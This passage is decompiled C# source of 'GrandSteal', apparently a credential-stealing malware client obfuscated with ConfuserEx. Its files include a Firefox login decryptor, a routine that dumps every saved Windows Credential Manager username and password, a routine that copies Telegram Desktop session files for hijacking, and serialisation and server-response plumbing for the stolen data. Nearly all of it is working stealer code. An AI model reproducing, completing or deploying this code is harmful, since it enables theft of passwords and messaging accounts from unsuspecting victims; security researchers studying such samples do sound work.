 8 | 		// Token: 0x04000068 RID: 104
 9 | 		Sequence = 48,
10 | 		// Token: 0x04000069 RID: 105
11 | 		Integer = 2,
12 | 		// Token: 0x0400006A RID: 106
13 | 		BitString,
14 | 		// Token: 0x0400006B RID: 107
15 | 		OctetString,
16 | 		// Token: 0x0400006C RID: 108
17 | 		Null,
18 | 		// Token: 0x0400006D RID: 109
19 | 		ObjectIdentifier
20 | 	}
21 | }
22 | 


--------------------------------------------------------------------------------
/GrandSteal/GrandSteal.Client.Data/GrandSteal.Client.Data/Gecko/CrytoServiceProvider.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Security.Cryptography;
 3 | using System.Text;
 4 | 
 5 | namespace GrandSteal.Client.Data.Gecko
 6 | {
 7 | 	// Token: 0x0200002A RID: 42
 8 | 	public static class CrytoServiceProvider
 9 | 	{
10 | 		// Token: 0x060000FC RID: 252 RVA: 0x000082B4 File Offset: 0x000064B4
11 | 		public static string Decode(byte[] key, byte[] iv, byte[] input, PaddingMode paddingMode = PaddingMode.None)
12 | 		{
13 | 			string @string;
14 | 			using (TripleDESCryptoServiceProvider tripleDESCryptoServiceProvider = new TripleDESCryptoServiceProvider())
15 | 			{
16 | 				tripleDESCryptoServiceProvider.Key = key;
17 | 				tripleDESCryptoServiceProvider.IV = iv;
18 | 				tripleDESCryptoServiceProvider.Mode = CipherMode.CBC;
19 | 				tripleDESCryptoServiceProvider.Padding = paddingMode;
20 | 				using (ICryptoTransform cryptoTransform = tripleDESCryptoServiceProvider.CreateDecryptor(key, iv))
21 | 				{
22 | 					@string = Encoding.Default.GetString(cryptoTransform.TransformFinalBlock(input, 0, input.Length));
23 | 				}
24 | 			}
25 | 			return @string;
26 | 		}
27 | 	}
28 | }
29 | 


--------------------------------------------------------------------------------
/GrandSteal/GrandSteal.Client.Data/GrandSteal.Client.Data/Gecko/DataParser.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Globalization;
 3 | using System.Runtime.CompilerServices;
 4 | 
 5 | namespace GrandSteal.Client.Data.Gecko
 6 | {
 7 | 	// Token: 0x02000029 RID: 41
 8 | 	public class DataParser
 9 | 	{
10 | 		// Token: 0x1700003C RID: 60
11 | 		// (get) Token: 0x060000F8 RID: 248 RVA: 0x00002619 File Offset: 0x00000819
12 | 		public string EntrySalt
13 | 		{
14 | 			[CompilerGenerated]
15 | 			get
16 | 			{
17 | 				return this.<EntrySalt>k__BackingField;
18 | 			}
19 | 		}
20 | 
21 | 		// Token: 0x1700003D RID: 61
22 | 		// (get) Token: 0x060000F9 RID: 249 RVA: 0x00002621 File Offset: 0x00000821
23 | 		public string OID
24 | 		{
25 | 			[CompilerGenerated]
26 | 			get
27 | 			{
28 | 				return this.<OID>k__BackingField;
29 | 			}
30 | 		}
31 | 
32 | 		// Token: 0x1700003E RID: 62
33 | 		// (get) Token: 0x060000FA RID: 250 RVA: 0x00002629 File Offset: 0x00000829
34 | 		public string Passwordcheck
35 | 		{
36 | 			[CompilerGenerated]
37 | 			get
38 | 			{
39 | 				return this.<Passwordcheck>k__BackingField;
40 | 			}
41 | 		}
42 | 
43 | 		// Token: 0x060000FB RID: 251 RVA: 0x00008248 File Offset: 0x00006448
44 | 		public DataParser(string DataToParse)
45 | 		{
46 | 			int num = int.Parse(DataToParse.Substring(2, 2), NumberStyles.HexNumber) * 2;
47 | 			this.<EntrySalt>k__BackingField = DataToParse.Substring(6, num);
48 | 			int num2 = DataToParse.Length - (6 + num + 36);
49 | 			this.<OID>k__BackingField = DataToParse.Substring(6 + num + 36, num2);
50 | 			this.<Passwordcheck>k__BackingField = DataToParse.Substring(6 + num + 4 + num2);
51 | 		}
52 | 	}
53 | }
54 | 


--------------------------------------------------------------------------------
/GrandSteal/GrandSteal.Client.Data/GrandSteal.Client.Data/Gecko/GeckoRootEntry.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | 
 3 | namespace GrandSteal.Client.Data.Gecko
 4 | {
 5 | 	// Token: 0x02000026 RID: 38
 6 | 	public class GeckoRootEntry
 7 | 	{
 8 | 		// Token: 0x17000025 RID: 37
 9 | 		// (get) Token: 0x060000C9 RID: 201 RVA: 0x00002490 File Offset: 0x00000690
10 | 		// (set) Token: 0x060000CA RID: 202 RVA: 0x00002498 File Offset: 0x00000698
11 | 		public int nextId
12 | 		{
13 | 			get;
14 | 			set;
15 | 		}
16 | 
17 | 		// Token: 0x17000026 RID: 38
18 | 		// (get) Token: 0x060000CB RID: 203 RVA: 0x000024A1 File Offset: 0x000006A1
19 | 		// (set) Token: 0x060000CC RID: 204 RVA: 0x000024A9 File Offset: 0x000006A9
20 | 		public GeckoLogin[] logins
21 | 		{
22 | 			get;
23 | 			set;
24 | 		}
25 | 
26 | 		// Token: 0x17000027 RID: 39
27 | 		// (get) Token: 0x060000CD RID: 205 RVA: 0x000024B2 File Offset: 0x000006B2
28 | 		// (set) Token: 0x060000CE RID: 206 RVA: 0x000024BA File Offset: 0x000006BA
29 | 		public object[] disabledHosts
30 | 		{
31 | 			get;
32 | 			set;
33 | 		}
34 | 
35 | 		// Token: 0x17000028 RID: 40
36 | 		// (get) Token: 0x060000CF RID: 207 RVA: 0x000024C3 File Offset: 0x000006C3
37 | 		// (set) Token: 0x060000D0 RID: 208 RVA: 0x000024CB File Offset: 0x000006CB
38 | 		public int version
39 | 		{
40 | 			get;
41 | 			set;
42 | 		}
43 | 	}
44 | }
45 | 


--------------------------------------------------------------------------------
/GrandSteal/GrandSteal.Client.Data/GrandSteal.Client.Data/Helpers/ConstantStorage.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.IO;
 3 | 
 4 | namespace GrandSteal.Client.Data.Helpers
 5 | {
 6 | 	// Token: 0x0200001F RID: 31
 7 | 	public static class ConstantStorage
 8 | 	{
 9 | 		// Token: 0x0400005F RID: 95
10 | 		public static readonly byte[] Key4MagicNumber = new byte[]
11 | 		{
12 | 			248,
13 | 			0,
14 | 			0,
15 | 			0,
16 | 			0,
17 | 			0,
18 | 			0,
19 | 			0,
20 | 			0,
21 | 			0,
22 | 			0,
23 | 			0,
24 | 			0,
25 | 			0,
26 | 			0,
27 | 			1
28 | 		};
29 | 
30 | 		// Token: 0x04000060 RID: 96
31 | 		public static readonly string LocalAppData = Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"), "AppData\\Local");
32 | 
33 | 		// Token: 0x04000061 RID: 97
34 | 		public static readonly string RoamingAppData = Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"), "AppData\\Roaming");
35 | 
36 | 		// Token: 0x04000062 RID: 98
37 | 		public static readonly string TempDirectory = Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"), "AppData\\Local\\Temp");
38 | 	}
39 | }
40 | 


--------------------------------------------------------------------------------
/GrandSteal/GrandSteal.Client.Data/GrandSteal.Client.Data/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Diagnostics;
 3 | using System.Reflection;
 4 | using System.Runtime.CompilerServices;
 5 | using System.Runtime.InteropServices;
 6 | 
 7 | [assembly: AssemblyVersion("1.0.0.0")]
 8 | [assembly: AssemblyCopyright("Copyright ©  2018")]
 9 | [assembly: AssemblyProduct("GrandSteal.Client.Data")]
10 | [assembly: AssemblyCompany("")]
11 | [assembly: AssemblyTrademark("")]
12 | [assembly: AssemblyFileVersion("1.0.0.0")]
13 | [assembly: Guid("40150f0d-b292-4f66-8eac-17674b2c0cb2")]
14 | [assembly: ComVisible(false)]
15 | [assembly: RuntimeCompatibility(WrapNonExceptionThrows = true)]
16 | [assembly: CompilationRelaxations(8)]
17 | [assembly: Debuggable(DebuggableAttribute.DebuggingModes.IgnoreSymbolStoreSequencePoints)]
18 | [assembly: AssemblyConfiguration("")]
19 | [assembly: AssemblyDescription("")]
20 | [assembly: AssemblyTitle("GrandSteal.Client.Data")]
21 | [module: ConfusedBy("ConfuserEx v1.0.0-33-ga1d8d38")]
22 | 


--------------------------------------------------------------------------------
/GrandSteal/GrandSteal.Client.Data/GrandSteal.Client.Data/Recovery/RdpManager.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Collections.Generic;
 3 | using CredentialManagement;
 4 | using GrandSteal.Client.Models.Credentials;
 5 | using GrandSteal.SharedModels.Models;
 6 | 
 7 | namespace GrandSteal.Client.Data.Recovery
 8 | {
 9 | 	// Token: 0x0200001D RID: 29
10 | 	public class RdpManager : ICredentialsManager<RdpCredential>
11 | 	{
12 | 		// Token: 0x060000AA RID: 170 RVA: 0x0000707C File Offset: 0x0000527C
13 | 		public List<RdpCredential> GetAll()
14 | 		{
15 | 			List<RdpCredential> list = new List<RdpCredential>();
16 | 			try
17 | 			{
18 | 				CredentialSet credentialSet = new CredentialSet().Load();
19 | 				int num = 0;
20 | 				while (true)
21 | 				{
22 | 					int arg_2D_0 = num;
23 | 					int? num2 = (credentialSet == null) ? null : new int?(credentialSet.Count);
24 | 					if (!(arg_2D_0 < num2.GetValueOrDefault() & num2.HasValue))
25 | 					{
26 | 						break;
27 | 					}
28 | 					List<RdpCredential> arg_C1_0 = list;
29 | 					RdpCredential expr_42 = new RdpCredential();
30 | 					Credential expr_4A = credentialSet[num];
31 | 					expr_42.Target = ((expr_4A != null) ? expr_4A.get_Target() : null);
32 | 					Credential expr_63 = credentialSet[num];
33 | 					expr_42.Password = (string.IsNullOrEmpty((expr_63 != null) ? expr_63.get_Password() : null) ? "NOT SAVED" : credentialSet[num].get_Password());
34 | 					Credential expr_96 = credentialSet[num];
35 | 					expr_42.Username = (string.IsNullOrEmpty((expr_96 != null) ? expr_96.get_Username() : null) ? "NOT SAVED" : credentialSet[num].get_Username());
36 | 					arg_C1_0.Add(expr_42);
37 | 					num++;
38 | 				}
39 | 			}
40 | 			catch
41 | 			{
42 | 			}
43 | 			return list;
44 | 		}
45 | 	}
46 | }
47 | 


--------------------------------------------------------------------------------
/GrandSteal/GrandSteal.Client.Data/GrandSteal.Client.Data/Recovery/TelegramManager.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.IO;
 3 | using GrandSteal.Client.Data.Helpers;
 4 | using GrandSteal.SharedModels.Models;
 5 | 
 6 | namespace GrandSteal.Client.Data.Recovery
 7 | {
 8 | 	// Token: 0x0200001E RID: 30
 9 | 	public static class TelegramManager
10 | 	{
11 | 		// Token: 0x060000AC RID: 172 RVA: 0x00007180 File Offset: 0x00005380
12 | 		public static TelegramSession Extract()
13 | 		{
14 | 			TelegramSession telegramSession = new TelegramSession();
15 | 			try
16 | 			{
17 | 				string path = Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"), "AppData\\Roaming\\Telegram Desktop\\tdata");
18 | 				string path2 = Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"), "AppData\\Roaming\\Telegram Desktop\\tdata\\D877F783D5D3EF8C");
19 | 				if (!Directory.Exists(path) || !Directory.Exists(path2))
20 | 				{
21 | 					return telegramSession;
22 | 				}
23 | 				string[] files = Directory.GetFiles(path, "D877F783D5D3EF8C*");
24 | 				if (files.Length != 0)
25 | 				{
26 | 					byte[] fileData = File.ReadAllBytes(RecoveryHelper.CreateTempCopy(files[0]));
27 | 					string[] files2 = Directory.GetFiles(path2, "map*");
28 | 					if (files2.Length != 0)
29 | 					{
30 | 						byte[] fileData2 = File.ReadAllBytes(RecoveryHelper.CreateTempCopy(files[0]));
31 | 						telegramSession.MapFile = new DesktopFile
32 | 						{
33 | 							FileData = fileData2,
34 | 							Filename = new FileInfo(files2[0]).Name
35 | 						};
36 | 						telegramSession.RootFile = new DesktopFile
37 | 						{
38 | 							FileData = fileData,
39 | 							Filename = new FileInfo(files[0]).Name
40 | 						};
41 | 					}
42 | 				}
43 | 			}
44 | 			catch (Exception)
45 | 			{
46 | 			}
47 | 			return telegramSession;
48 | 		}
49 | 	}
50 | }
51 | 


--------------------------------------------------------------------------------
/GrandSteal/GrandSteal.Client.Data/GrandSteal.Client.Data/SQLite/DataRow.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | 
 3 | namespace GrandSteal.Client.Data.SQLite
 4 | {
 5 | 	// Token: 0x02000004 RID: 4
 6 | 	public struct DataRow
 7 | 	{
 8 | 		// Token: 0x1700000A RID: 10
 9 | 		// (get) Token: 0x0600001D RID: 29 RVA: 0x00002152 File Offset: 0x00000352
10 | 		// (set) Token: 0x0600001E RID: 30 RVA: 0x0000215A File Offset: 0x0000035A
11 | 		public long RowID
12 | 		{
13 | 			get;
14 | 			set;
15 | 		}
16 | 
17 | 		// Token: 0x1700000B RID: 11
18 | 		// (get) Token: 0x0600001F RID: 31 RVA: 0x00002163 File Offset: 0x00000363
19 | 		// (set) Token: 0x06000020 RID: 32 RVA: 0x0000216B File Offset: 0x0000036B
20 | 		public string[] Content
21 | 		{
22 | 			get;
23 | 			set;
24 | 		}
25 | 	}
26 | }
27 | 


--------------------------------------------------------------------------------
/GrandSteal/GrandSteal.Client.Data/GrandSteal.Client.Data/SQLite/FieldHeader.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | 
 3 | namespace GrandSteal.Client.Data.SQLite
 4 | {
 5 | 	// Token: 0x02000005 RID: 5
 6 | 	public struct FieldHeader
 7 | 	{
 8 | 		// Token: 0x1700000C RID: 12
 9 | 		// (get) Token: 0x06000021 RID: 33 RVA: 0x00002174 File Offset: 0x00000374
10 | 		// (set) Token: 0x06000022 RID: 34 RVA: 0x0000217C File Offset: 0x0000037C
11 | 		public long Size
12 | 		{
13 | 			get;
14 | 			set;
15 | 		}
16 | 
17 | 		// Token: 0x1700000D RID: 13
18 | 		// (get) Token: 0x06000023 RID: 35 RVA: 0x00002185 File Offset: 0x00000385
19 | 		// (set) Token: 0x06000024 RID: 36 RVA: 0x0000218D File Offset: 0x0000038D
20 | 		public long Type
21 | 		{
22 | 			get;
23 | 			set;
24 | 		}
25 | 	}
26 | }
27 | 


--------------------------------------------------------------------------------
/GrandSteal/GrandSteal.Client.Data/GrandSteal.Client.Data/SQLite/MasterEntry.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | 
 3 | namespace GrandSteal.Client.Data.SQLite
 4 | {
 5 | 	// Token: 0x02000006 RID: 6
 6 | 	public struct MasterEntry
 7 | 	{
 8 | 		// Token: 0x1700000E RID: 14
 9 | 		// (get) Token: 0x06000025 RID: 37 RVA: 0x00002196 File Offset: 0x00000396
10 | 		// (set) Token: 0x06000026 RID: 38 RVA: 0x0000219E File Offset: 0x0000039E
11 | 		public long RowID
12 | 		{
13 | 			get;
14 | 			set;
15 | 		}
16 | 
17 | 		// Token: 0x1700000F RID: 15
18 | 		// (get) Token: 0x06000027 RID: 39 RVA: 0x000021A7 File Offset: 0x000003A7
19 | 		// (set) Token: 0x06000028 RID: 40 RVA: 0x000021AF File Offset: 0x000003AF
20 | 		public string ItemType
21 | 		{
22 | 			get;
23 | 			set;
24 | 		}
25 | 
26 | 		// Token: 0x17000010 RID: 16
27 | 		// (get) Token: 0x06000029 RID: 41 RVA: 0x000021B8 File Offset: 0x000003B8
28 | 		// (set) Token: 0x0600002A RID: 42 RVA: 0x000021C0 File Offset: 0x000003C0
29 | 		public string ItemName
30 | 		{
31 | 			get;
32 | 			set;
33 | 		}
34 | 
35 | 		// Token: 0x17000011 RID: 17
36 | 		// (get) Token: 0x0600002B RID: 43 RVA: 0x000021C9 File Offset: 0x000003C9
37 | 		// (set) Token: 0x0600002C RID: 44 RVA: 0x000021D1 File Offset: 0x000003D1
38 | 		public string AstableName
39 | 		{
40 | 			get;
41 | 			set;
42 | 		}
43 | 
44 | 		// Token: 0x17000012 RID: 18
45 | 		// (get) Token: 0x0600002D RID: 45 RVA: 0x000021DA File Offset: 0x000003DA
46 | 		// (set) Token: 0x0600002E RID: 46 RVA: 0x000021E2 File Offset: 0x000003E2
47 | 		public long RootNum
48 | 		{
49 | 			get;
50 | 			set;
51 | 		}
52 | 
53 | 		// Token: 0x17000013 RID: 19
54 | 		// (get) Token: 0x0600002F RID: 47 RVA: 0x000021EB File Offset: 0x000003EB
55 | 		// (set) Token: 0x06000030 RID: 48 RVA: 0x000021F3 File Offset: 0x000003F3
56 | 		public string SqlStatement
57 | 		{
58 | 			get;
59 | 			set;
60 | 		}
61 | 	}
62 | }
63 | 


--------------------------------------------------------------------------------
/GrandSteal/GrandSteal.Client.Data/GrandSteal.Client.Data/Server/ResponseHandler.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using GrandSteal.SharedModels.Communication;
 3 | 
 4 | namespace GrandSteal.Client.Data.Server
 5 | {
 6 | 	// Token: 0x02000007 RID: 7
 7 | 	// (Invoke) Token: 0x06000032 RID: 50
 8 | 	public delegate bool ResponseHandler(ResponseBase response);
 9 | }
10 | 


--------------------------------------------------------------------------------
/GrandSteal/GrandSteal.Client.Data/GrandSteal.Client.Data/SetupStorage.Designer.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.CodeDom.Compiler;
 3 | using System.Collections.Specialized;
 4 | using System.Configuration;
 5 | using System.Diagnostics;
 6 | using System.Runtime.CompilerServices;
 7 | 
 8 | namespace GrandSteal.Client.Data
 9 | {
10 | 	// Token: 0x02000002 RID: 2
11 | 	[GeneratedCode("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "15.9.0.0"), CompilerGenerated]
12 | 	internal sealed partial class SetupStorage : ApplicationSettingsBase
13 | 	{
14 | 		// Token: 0x17000001 RID: 1
15 | 		// (get) Token: 0x06000002 RID: 2 RVA: 0x0000205E File Offset: 0x0000025E
16 | 		public static SetupStorage Default
17 | 		{
18 | 			get
19 | 			{
20 | 				return SetupStorage.defaultInstance;
21 | 			}
22 | 		}
23 | 
24 | 		// Token: 0x04000001 RID: 1
25 | 		private static SetupStorage defaultInstance = (SetupStorage)SettingsBase.Synchronized(new SetupStorage());
26 | 	}
27 | }
28 | 


--------------------------------------------------------------------------------
/GrandSteal/GrandSteal.Client.Data/GrandSteal.Client.Data/SetupStorage.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.CodeDom.Compiler;
 3 | using System.Collections.Specialized;
 4 | using System.Configuration;
 5 | using System.Diagnostics;
 6 | using System.Runtime.CompilerServices;
 7 | 
 8 | namespace GrandSteal.Client.Data
 9 | {
10 | 	// Token: 0x02000002 RID: 2
11 | 	[GeneratedCode("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "15.9.0.0"), CompilerGenerated]
12 | 	internal sealed partial class SetupStorage : ApplicationSettingsBase
13 | 	{
14 | 		// Token: 0x17000002 RID: 2
15 | 		// (get) Token: 0x06000003 RID: 3 RVA: 0x00002065 File Offset: 0x00000265
16 | 		// (set) Token: 0x06000004 RID: 4 RVA: 0x00002077 File Offset: 0x00000277
17 | 		[UserScopedSetting, DebuggerNonUserCode]
18 | 		public StringCollection Setups
19 | 		{
20 | 			get
21 | 			{
22 | 				return (StringCollection)this["Setups"];
23 | 			}
24 | 			set
25 | 			{
26 | 				this["Setups"] = value;
27 | 			}
28 | 		}
29 | 	}
30 | }
31 | 


--------------------------------------------------------------------------------
/GrandSteal/GrandSteal.Client.Models/GrandSteal.Client.Models/-Module-.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | 
3 | // Token: 0x02000001 RID: 1
4 | internal class <Module>
5 | {
6 | }
7 | 


--------------------------------------------------------------------------------
/GrandSteal/GrandSteal.Client.Models/GrandSteal.Client.Models/AsyncAction.2.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | 
3 | namespace GrandSteal.Client.Models
4 | {
5 | 	// Token: 0x02000004 RID: 4
6 | 	// (Invoke) Token: 0x06000008 RID: 8
7 | 	public delegate void AsyncAction();
8 | }
9 | 


--------------------------------------------------------------------------------
/GrandSteal/GrandSteal.Client.Models/GrandSteal.Client.Models/AsyncAction.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | 
3 | namespace GrandSteal.Client.Models
4 | {
5 | 	// Token: 0x02000003 RID: 3
6 | 	// (Invoke) Token: 0x06000004 RID: 4
7 | 	public delegate T AsyncAction<T>();
8 | }
9 | 


--------------------------------------------------------------------------------
/GrandSteal/GrandSteal.Client.Models/GrandSteal.Client.Models/AsyncTask.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Threading;
 3 | 
 4 | namespace GrandSteal.Client.Models
 5 | {
 6 | 	// Token: 0x02000005 RID: 5
 7 | 	public class AsyncTask
 8 | 	{
 9 | 		// Token: 0x0600000B RID: 11 RVA: 0x000024E0 File Offset: 0x000006E0
10 | 		public static AsyncAction<R> StartNew<R>(AsyncAction<R> function)
11 | 		{
12 | 			R retv = default(R);
13 | 			bool completed = false;
14 | 			object sync = new object();
15 | 			function.BeginInvoke(delegate(IAsyncResult iAsyncResult)
16 | 			{
17 | 				object sync = sync;
18 | 				lock (sync)
19 | 				{
20 | 					completed = true;
21 | 					retv = function.EndInvoke(iAsyncResult);
22 | 					Monitor.Pulse(sync);
23 | 				}
24 | 			}, null);
25 | 			return delegate
26 | 			{
27 | 				object sync = sync;
28 | 				R retv;
29 | 				lock (sync)
30 | 				{
31 | 					if (!completed)
32 | 					{
33 | 						Monitor.Wait(sync);
34 | 					}
35 | 					retv = retv;
36 | 				}
37 | 				return retv;
38 | 			};
39 | 		}
40 | 
41 | 		// Token: 0x0600000C RID: 12 RVA: 0x00002540 File Offset: 0x00000740
42 | 		public static AsyncAction StartNew(AsyncAction function)
43 | 		{
44 | 			bool completed = false;
45 | 			object sync = new object();
46 | 			function.BeginInvoke(delegate(IAsyncResult iAsyncResult)
47 | 			{
48 | 				object sync = sync;
49 | 				lock (sync)
50 | 				{
51 | 					completed = true;
52 | 					function.EndInvoke(iAsyncResult);
53 | 					Monitor.Pulse(sync);
54 | 				}
55 | 			}, null);
56 | 			return delegate
57 | 			{
58 | 				object sync = sync;
59 | 				lock (sync)
60 | 				{
61 | 					if (!completed)
62 | 					{
63 | 						Monitor.Wait(sync);
64 | 					}
65 | 				}
66 | 			};
67 | 		}
68 | 	}
69 | }
70 | 


--------------------------------------------------------------------------------
/GrandSteal/GrandSteal.Client.Models/GrandSteal.Client.Models/ConfusedByAttribute.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | 
 3 | // Token: 0x02000013 RID: 19
 4 | internal class ConfusedByAttribute : Attribute
 5 | {
 6 | 	// Token: 0x06000084 RID: 132 RVA: 0x00002052 File Offset: 0x00000252
 7 | 	public ConfusedByAttribute(string string_0)
 8 | 	{
 9 | 	}
10 | }
11 | 


--------------------------------------------------------------------------------
/GrandSteal/GrandSteal.Client.Models/GrandSteal.Client.Models/Credentials/ICredentialsManager.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Collections.Generic;
 3 | 
 4 | namespace GrandSteal.Client.Models.Credentials
 5 | {
 6 | 	// Token: 0x0200000E RID: 14
 7 | 	public interface ICredentialsManager<T>
 8 | 	{
 9 | 		// Token: 0x06000067 RID: 103
10 | 		List<T> GetAll();
11 | 	}
12 | }
13 | 


--------------------------------------------------------------------------------
/GrandSteal/GrandSteal.Client.Models/GrandSteal.Client.Models/Extensions/Json/JsonExtensions.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using Newtonsoft.Json;
 3 | 
 4 | namespace GrandSteal.Client.Models.Extensions.Json
 5 | {
 6 | 	// Token: 0x02000011 RID: 17
 7 | 	public static class JsonExtensions
 8 | 	{
 9 | 		// Token: 0x06000077 RID: 119 RVA: 0x00002405 File Offset: 0x00000605
10 | 		public static T FromJSON<T>(this string message)
11 | 		{
12 | 			return JsonConvert.DeserializeObject<T>(message);
13 | 		}
14 | 
15 | 		// Token: 0x06000078 RID: 120 RVA: 0x0000240D File Offset: 0x0000060D
16 | 		public static string ToJSON<T>(this T message)
17 | 		{
18 | 			return JsonConvert.SerializeObject(message);
19 | 		}
20 | 	}
21 | }
22 | 


--------------------------------------------------------------------------------
/GrandSteal/GrandSteal.Client.Models/GrandSteal.Client.Models/Extensions/ProtoExtensions.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.IO;
 3 | using ProtoBuf;
 4 | using ProtoBuf.Meta;
 5 | 
 6 | namespace GrandSteal.Client.Models.Extensions
 7 | {
 8 | 	// Token: 0x0200000F RID: 15
 9 | 	public static class ProtoExtensions
10 | 	{
11 | 		// Token: 0x06000068 RID: 104 RVA: 0x00003DE8 File Offset: 0x00001FE8
12 | 		public static byte[] SerializeProto<T>(this T instance)
13 | 		{
14 | 			byte[] buffer;
15 | 			using (MemoryStream memoryStream = new MemoryStream())
16 | 			{
17 | 				RuntimeTypeModel.Default.SerializeWithLengthPrefix(memoryStream, instance, typeof(T), PrefixStyle.Base128, 1);
18 | 				buffer = memoryStream.GetBuffer();
19 | 			}
20 | 			return buffer;
21 | 		}
22 | 
23 | 		// Token: 0x06000069 RID: 105 RVA: 0x00003E3C File Offset: 0x0000203C
24 | 		public static T DeSerializeProto<T>(this byte[] data)
25 | 		{
26 | 			T t;
27 | 			using (MemoryStream memoryStream = new MemoryStream(data))
28 | 			{
29 | 				TypeModel arg_27_0 = RuntimeTypeModel.Default;
30 | 				Stream arg_27_1 = memoryStream;
31 | 				t = default(T);
32 | 				t = (T)((object)arg_27_0.DeserializeWithLengthPrefix(arg_27_1, t, typeof(T), PrefixStyle.Base128, 1));
33 | 			}
34 | 			return t;
35 | 		}
36 | 	}
37 | }
38 | 


--------------------------------------------------------------------------------
/GrandSteal/GrandSteal.Client.Models/GrandSteal.Client.Models/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Diagnostics;
 3 | using System.Reflection;
 4 | using System.Runtime.CompilerServices;
 5 | using System.Runtime.InteropServices;
 6 | 
 7 | [assembly: AssemblyVersion("1.0.0.0")]
 8 | [assembly: AssemblyTrademark("")]
 9 | [assembly: AssemblyProduct("GrandSteal.Client.Models")]
10 | [assembly: ComVisible(false)]
11 | [assembly: AssemblyCopyright("Copyright ©  2018")]
12 | [assembly: AssemblyFileVersion("1.0.0.0")]
13 | [assembly: Guid("46b2de09-ef7f-4ed1-aab3-1e30f3c71beb")]
14 | [assembly: Debuggable(DebuggableAttribute.DebuggingModes.IgnoreSymbolStoreSequencePoints)]
15 | [assembly: RuntimeCompatibility(WrapNonExceptionThrows = true)]
16 | [assembly: CompilationRelaxations(8)]
17 | [assembly: AssemblyTitle("GrandSteal.Client.Models")]
18 | [assembly: AssemblyCompany("")]
19 | [assembly: AssemblyConfiguration("")]
20 | [assembly: AssemblyDescription("")]
21 | [module: ConfusedBy("ConfuserEx v1.0.0-33-ga1d8d38")]
22 | 


--------------------------------------------------------------------------------
/GrandSteal/GrandSteal.Client.Models/GrandSteal.Client.Models/Properties/Resources.Designer.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.CodeDom.Compiler;
 3 | using System.ComponentModel;
 4 | using System.Diagnostics;
 5 | using System.Globalization;
 6 | using System.Resources;
 7 | using System.Runtime.CompilerServices;
 8 | 
 9 | namespace GrandSteal.Client.Models.Properties
10 | {
11 | 	// Token: 0x0200000C RID: 12
12 | 	[GeneratedCode("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0"), CompilerGenerated, DebuggerNonUserCode]
13 | 	internal class Resources
14 | 	{
15 | 		// Token: 0x06000060 RID: 96 RVA: 0x0000205A File Offset: 0x0000025A
16 | 		internal Resources()
17 | 		{
18 | 		}
19 | 
20 | 		// Token: 0x1700001B RID: 27
21 | 		// (get) Token: 0x06000061 RID: 97 RVA: 0x000022F8 File Offset: 0x000004F8
22 | 		[EditorBrowsable(EditorBrowsableState.Advanced)]
23 | 		internal static ResourceManager ResourceManager
24 | 		{
25 | 			get
26 | 			{
27 | 				if (Resources.resourceMan == null)
28 | 				{
29 | 					Resources.resourceMan = new ResourceManager("GrandSteal.Client.Models.Properties.Resources", typeof(Resources).Assembly);
30 | 				}
31 | 				return Resources.resourceMan;
32 | 			}
33 | 		}
34 | 
35 | 		// Token: 0x1700001C RID: 28
36 | 		// (get) Token: 0x06000062 RID: 98 RVA: 0x00002324 File Offset: 0x00000524
37 | 		// (set) Token: 0x06000063 RID: 99 RVA: 0x0000232B File Offset: 0x0000052B
38 | 		[EditorBrowsable(EditorBrowsableState.Advanced)]
39 | 		internal static CultureInfo Culture
40 | 		{
41 | 			get
42 | 			{
43 | 				return Resources.resourceCulture;
44 | 			}
45 | 			set
46 | 			{
47 | 				Resources.resourceCulture = value;
48 | 			}
49 | 		}
50 | 
51 | 		// Token: 0x04000024 RID: 36
52 | 		private static ResourceManager resourceMan;
53 | 
54 | 		// Token: 0x04000025 RID: 37
55 | 		private static CultureInfo resourceCulture;
56 | 	}
57 | }
58 | 


--------------------------------------------------------------------------------
/GrandSteal/GrandSteal.Client.Models/GrandSteal.Client.Models/Properties/Settings.Designer.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.CodeDom.Compiler;
 3 | using System.Configuration;
 4 | using System.Runtime.CompilerServices;
 5 | 
 6 | namespace GrandSteal.Client.Models.Properties
 7 | {
 8 | 	// Token: 0x0200000D RID: 13
 9 | 	[GeneratedCode("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "11.0.0.0"), CompilerGenerated]
10 | 	internal sealed partial class Settings : ApplicationSettingsBase
11 | 	{
12 | 		// Token: 0x1700001D RID: 29
13 | 		// (get) Token: 0x06000064 RID: 100 RVA: 0x00002333 File Offset: 0x00000533
14 | 		public static Settings Default
15 | 		{
16 | 			get
17 | 			{
18 | 				return Settings.defaultInstance;
19 | 			}
20 | 		}
21 | 
22 | 		// Token: 0x04000026 RID: 38
